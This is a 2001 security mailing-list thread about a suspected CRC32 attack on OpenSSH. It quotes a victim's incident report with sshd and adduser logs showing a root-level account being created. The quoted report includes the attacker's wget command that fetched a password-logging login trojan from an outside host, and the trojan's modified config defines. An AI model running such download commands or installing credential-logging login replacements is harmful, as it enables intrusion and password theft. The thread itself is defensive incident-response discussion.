Security Incidents mailing list archives
Re: Attacks against SSH?
From: Aaron Schultz <aaron () powertrip net>
Date: Mon, 3 Dec 2001 11:02:56 -0800 (PST)
We've disabled the account where the group was storing the login.tgz file. The accounts are simply part of free hosting we provide, the box was not hacked. See http://home.dal.net for more info about the setup. On a similar note, I've noticed scans to port 22 increase recently. - Aaron Schultz [Wagahai] - DALnet Webteam On Mon, 3 Dec 2001 johan.augustsson () adm gu se wrote:
I stumbeled over this post at openssh-unix-dev mailinglist last week - http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2 The poster claims that he had OpenSSH-2.9p2-8.7 (latest uppdate for RedHat 7.0) up and running when he received what looks to be a CRC32-attack. A few minutes later you can see (he posted parts of the logfile) a new user being created with uid=0 and then how an connection is made from system in Israel. There has been no confirmation about what he writes but I recieved the following mail as an answer of my questions. ------ Message ------ I posted an openssh security alert earlier today and already got some responses. Thanks for everything. Instead of replying to everyone individually I composed the details of the attack. +++ It does not look like a job of worms. Snort did not detect mass port scan from attacker's ip address. It seems that he (I assumed, so I don't have to type he/she all the way) just wants to gain access through openssh. The server is running Red Hat 7.0. With all packages up to date. The following daemons are running: wu-ftpd, apache, telnet, openssh, named I never access the system via telnet, it is there just for backup purpose.Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensationattack:network attack detected Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on input. Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on input. Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on input. Nov 25 11:40:00 ns CROND[11022]: (root) CMD ( /sbin/rmmod -as) Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528 Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528,gid=528,home=/home/mattanl, shell=/bin/bash Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529 Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0,gid=529,home=/home/mattan, shell=/bin/bashAfter the attacker gained root access. He created two users mattan and mattanl. He then downloaded a package: wget http://home.dal.net/resolve/login.tgz. The target site has been compromised. (hacked by a hacker group in Israel) This is a login replacement package, it logs the user id and passwords. He modified rk.h to: #define MY_LOGFILE "/dev/ttypz" #define MY_PASSWORD "1245890" After he complied and installed the login replacement. Something went wrong. /bin/login was zero bytes in length. So when he came back using telnet, he was denied of access. I also disabled sshd and kept one session open for remote control after found login was replaced. I md5 checked the system against a good backup, nothing else was altered. I will try to sniff all packets come to my this server on ssh port. If he attempts to crack the server again, I will have more details. But I guess I will have to turn the server back on. Thanks for all you time ------ End of message ------ I had some further questions so I mailed the guy once again but has not recieved any answer. So, to he main question. Has anyone else had a system compromised by the CRC32-attack when running a version of sshd that is believed to be secure? OpenSSH-2.3.0 or later, SSH 1.2.32 or later. /Johan Augustsson -------------------------------------------------------------------- Johan Augustsson Phone: +46 (0)31 773 1000 Incident Response Team Fax: +46 (0)31 773 1087 G?teborg University E-mail: Johan.Augustsson () adm gu se Sweden -------------------------------------------------------------------- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Attacks against SSH? johan . augustsson (Dec 03)
- Re: Attacks against SSH? Aaron Schultz (Dec 03)
- Re: Attacks against SSH? f.johan.beisser (Dec 03)
- Re: Attacks against SSH? johan . augustsson (Dec 04)
- Re: Attacks against SSH? Jordan K Wiens (Dec 04)
- Re: Attacks against SSH? Dave Dittrich (Dec 04)
- Re: Attacks against SSH? Jason Baker (Dec 04)
- Re: Attacks against SSH? Michal Zalewski (Dec 04)
- Re: Attacks against SSH? Russell Fulton (Dec 04)
- Re: Attacks against SSH? Przemyslaw Frasunek (Dec 05)
- Re: Attacks against SSH? johan . augustsson (Dec 04)
- Re: Attacks against SSH? f.johan.beisser (Dec 04)